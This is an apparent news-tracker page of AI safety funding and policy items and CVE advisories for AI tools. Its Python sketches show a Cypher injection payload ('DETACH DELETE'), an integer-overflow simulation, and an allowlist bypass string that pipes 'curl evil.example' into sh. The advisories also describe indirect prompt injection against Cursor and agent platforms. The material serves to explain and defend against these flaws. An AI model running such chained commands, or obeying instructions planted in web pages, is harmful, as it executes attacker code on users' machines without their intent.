AI Signals Archive
All signals tracked by Mappera. Updated weekly.
Published by the Department for Science, Innovation and Technology and HM Treasury: the UK unveils a new package of measures aiming to become the first country in the world to roll out quantum computers at scale.
CVE-2026-32247 (CVSS 8.1 — HIGH). Graphiti is a framework for building and querying temporal context graphs for AI agents. Graphiti versions before 0.28.2 contained a Cypher injection vulnerability in shared search-filter construction for non-Kuzu backends. Attacker-controlled label values supplied through SearchFilters.node_labels were concatenated directly into Cypher label expressions without validation. In MCP deployments, this was exploitable not only through direct untrusted access to the Graphiti MCP server, but also through prompt injection against an LLM client that could be induced to issue searches containing attacker-supplied labels. This vulnerability is fixed in 0.28.2.
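The injection pattern described above can be sketched in Python. This is an illustrative reconstruction of the flaw's shape, not Graphiti's actual code — the function names and the validation regex are assumptions:

```python
import re

def build_label_expr_unsafe(node_labels):
    # Flawed pattern: caller-supplied labels are concatenated straight
    # into a Cypher label expression, so a crafted label value can close
    # the expression and append arbitrary Cypher clauses.
    return "MATCH (n:" + "|".join(node_labels) + ") RETURN n"

# Only bare identifiers are legal as unquoted Cypher labels.
LABEL_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

def build_label_expr_safe(node_labels):
    # Hardened pattern: reject anything that is not a bare identifier
    # before it ever reaches query construction.
    for label in node_labels:
        if not LABEL_RE.match(label):
            raise ValueError(f"invalid node label: {label!r}")
    return "MATCH (n:" + "|".join(node_labels) + ") RETURN n"

# A label value that escapes the expression and injects a new clause:
malicious = "Entity) DETACH DELETE n //"
print(build_label_expr_unsafe(["User", malicious]))
```

In the unsafe variant the injected clause becomes part of the query text; the safe variant raises before any query is built, which is the general fix for identifier positions (labels, relationship types) that Cypher parameters cannot cover.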
CVE-2026-27940 (CVSS 7.8 — HIGH). llama.cpp provides inference of several LLM models in C/C++. Prior to release b8146, gguf_init_from_file_impl() in gguf.cpp was vulnerable to an integer overflow leading to an undersized heap allocation; the subsequent fread() then writes 528+ bytes of attacker-controlled data past the buffer boundary. This bypasses the fix for a similar bug in the same file, CVE-2025-53630, which overlooked some code paths. This vulnerability is fixed in b8146.
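The overflow mechanics can be illustrated by simulating 32-bit size arithmetic in Python. The field width and example values here are assumptions chosen for illustration, not llama.cpp's actual computation:

```python
MASK32 = 0xFFFFFFFF

def alloc_size_wrapping(n_items, item_size):
    # Simulates an unchecked 32-bit multiply, as in C code that computes
    # an allocation size without an overflow guard: the true product is
    # truncated to its low 32 bits.
    return (n_items * item_size) & MASK32

def alloc_size_checked(n_items, item_size):
    # Python integers do not wrap, so the true product can be compared
    # against the 32-bit limit before any allocation happens.
    total = n_items * item_size
    if total > MASK32:
        raise OverflowError("allocation size overflows 32 bits")
    return total

# An attacker-controlled count from a crafted file header wraps the
# product down to a tiny allocation; a later bulk read of the claimed
# item count then writes far past the undersized buffer.
n = 0x2000_0001
print(alloc_size_wrapping(n, 8))  # 8 instead of 0x100000008
```

The checked variant mirrors the standard remediation: compute the size in a wider type (or with an explicit overflow check) and fail closed before allocating.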
CVE-2026-31854 (CVSS 8.7 — HIGH). Cursor is a code editor built for programming with AI. Prior to 2.0, if a visited website contains maliciously crafted instructions, the model may attempt to follow them in order to “assist” the user. When combined with a bypass of the command whitelist mechanism, such indirect prompt injections could result in commands being executed automatically, without the user’s explicit intent, thereby posing a significant security risk. This vulnerability is fixed in 2.0.
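A naive command allowlist of the kind such bypasses target can be sketched as follows. This is a generic illustration, not Cursor's actual mechanism — the allowlist contents and both checks are assumptions:

```python
import shlex

ALLOWLIST = {"ls", "cat", "echo"}
SHELL_META = set(";|&`$><\n")

def naive_is_allowed(cmd):
    # Flawed check: only the first token is inspected, so shell
    # operators can chain an arbitrary second command after an
    # allowed one.
    return cmd.split()[0] in ALLOWLIST

def stricter_is_allowed(cmd):
    # Reject shell metacharacters outright, then verify the first
    # token; executing the tokens without a shell closes off chaining.
    if set(cmd) & SHELL_META:
        return False
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return False
    return bool(tokens) and tokens[0] in ALLOWLIST

print(naive_is_allowed("echo hi && curl evil.example | sh"))  # True: bypass
print(stricter_is_allowed("echo hi && curl evil.example | sh"))
```

The design point: an allowlist that only classifies the command name is meaningless once the string is handed to a shell, because metacharacters let an injected instruction smuggle a second command inside an "allowed" one.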
CVE-2026-30741 (CVSS 9.8 — CRITICAL). A remote code execution (RCE) vulnerability in OpenClaw Agent Platform v2026.2.6 allows attackers to execute arbitrary code via a request-side prompt injection attack.
Request for proposals across 21 research areas in technical AI safety. Largest single-round safety RFP to date.
UK AI Safety Institute awards grants for systemic AI risk research and safety evaluation challenges.
Enterprise interpretability platform backed by Lightspeed Venture Partners.
DARPA cooperative agreement (B) to The Regents of the University of California: Special Year on Large Language Models and Transformers.
Survival and Flourishing Fund allocates $29M of $34.3M total to AI safety organisations in its largest round.
Intelligent model routing using representation analysis. Backed by NEA, Sequoia, a16z.
Pure safety research lab raises $1B at $5B valuation. Backed by a16z, Sequoia, DST Global, and others.
Enterprise networking giant acquires AI security startup, signalling maturation of robustness/security into mainstream enterprise procurement.